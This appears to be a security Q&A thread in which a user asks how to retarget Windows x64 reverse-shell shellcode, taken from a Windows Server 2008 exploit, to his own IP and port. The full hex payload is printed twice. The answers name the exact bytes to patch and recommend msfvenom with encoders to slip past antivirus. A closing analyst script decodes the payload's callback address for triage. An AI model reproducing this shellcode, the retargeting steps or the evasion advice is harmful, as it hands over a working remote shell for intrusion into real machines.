5

I was looking into the latest exploit for Windows Server 2008 here. When I tried to modify the code to fit my needs I got stuck on this line:

import binascii

# Shellcode TCP Reverse to 192.168.125.133 1337 (hex-encoded; unhexlify turns it into raw bytes)
reversetcp_shellcode = binascii.unhexlify(b'fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000539c0a87d8541544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5')

This is for the IP address "192.168.125.133" with port "1337". How can I change this "hex" code? I am not sure if it is actually hex, because it didn't convert to ASCII. Any help editing the code to use my IP address and the port I want?

Anders
user156894
  • You can easily recover the IP address and port by converting them to hex. Search the shellcode for c0a87d85 and 0539. – Arminius Aug 16 '17 at 03:41

2 Answers

1

You need to change the hex code for the port and the IP: 192.168.125.133 == c0.a8.7d.85, and port 1337 is 0539.

In your code you find both here:

fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc0200 0539 c0a87d85 41544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5

Just change both values to the ones you need.

fr00tyl00p
0

If you look closely, you find the port first and then the IP address in big-endian. Since ports are represented as "short" integers, they are generally 2 bytes. IPv4 addresses are represented as 4 bytes, so you are looking for a 6-byte-long string, or a 12-character hex string (given 2 hex chars = 1 byte of data). This would give you the string '0539c0a87d85', where '0539' is hex for 1337 and the remainder of the string contains the 4 byte values that you see in an IPv4 address (the decimal values between each period represented as hex). A simple Python command reveals that this string is found at index 232 (in the unhexlified version). Modify the six bytes there and you will customize your shellcode.

However, if your goal here is not necessarily digging into the details of shellcode, and rather just replacing the shellcode with whatever your necessities are (perhaps you want something other than just a reverse shell), I would strongly recommend you take a look at the metasploit-framework, particularly the msfvenom tool. It is a great tool for generating customized shellcode and even allows you to add encoders to obfuscate the shellcode, making it harder for anti-virus engines to detect the signature. You can find more information on how to use it on GitHub.

saltthehash
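As an added example (not code from the question or from either answer), a Python helper that decodes the embedded sockaddr_in the way the answer above describes: it anchors on the `mov r12, imm64` instruction that loads the struct, then reports the IP, the port and the byte offset of the port, which is the kind of callback extraction an analyst does when triaging a captured payload. The sample fragment below is a constructed excerpt around the question's shellcode, padded so the offset matches; running `find_callbacks_hex` on the full hex string from the question gives the same offset 232.

```python
import binascii
import ipaddress
import re
import struct
from typing import List, NamedTuple

# The Windows x64 reverse_tcp stub loads its whole sockaddr_in into a register
# with one `mov r12, imm64` (opcode bytes 49 bc followed by the 8-byte
# immediate). Laid out as the struct sits in memory, the immediate is:
#   sin_family  2 bytes, host order     -> 02 00        (AF_INET)
#   sin_port    2 bytes, network order  -> 05 39        (1337)
#   sin_addr    4 bytes, network order  -> c0 a8 7d 85  (192.168.125.133)
# Anchoring on "49 bc 02 00" keeps false positives low; these are the same
# bytes an analyst would put in a YARA rule for this stub.
SOCKADDR_IN_RE = re.compile(
    rb"\x49\xbc\x02\x00(?P<port>.{2})(?P<addr>.{4})", re.DOTALL
)


class Callback(NamedTuple):
    offset: int  # byte offset of sin_port, i.e. where '0539' starts
    ip: str
    port: int


def find_callbacks(shellcode: bytes) -> List[Callback]:
    """Return every embedded sockaddr_in, decoded to IP and port."""
    hits = []
    for m in SOCKADDR_IN_RE.finditer(shellcode):
        port = struct.unpack("!H", m.group("port"))[0]     # big-endian short
        ip = str(ipaddress.IPv4Address(m.group("addr")))  # 4 raw octets
        hits.append(Callback(m.start("port"), ip, port))
    return hits


def find_callbacks_hex(hex_blob: str) -> List[Callback]:
    """Same, for a hex string such as the one pasted in the question."""
    return find_callbacks(binascii.unhexlify(hex_blob.strip()))


# Constructed sample (not the full payload): the `mov r12, imm64` from the
# question's shellcode with its neighbouring `mov r13, rsp` and `push r12`,
# padded with NOPs so the port lands at offset 232, as the answer states.
SAMPLE = (
    b"\x90" * 225
    + b"\x49\x89\xe5"                              # mov r13, rsp
    + b"\x49\xbc\x02\x00\x05\x39\xc0\xa8\x7d\x85"  # mov r12, sockaddr_in
    + b"\x41\x54"                                  # push r12
)

if __name__ == "__main__":
    for cb in find_callbacks(SAMPLE):
        print(f"offset {cb.offset}: {cb.ip}:{cb.port}")  # offset 232: 192.168.125.133:1337
```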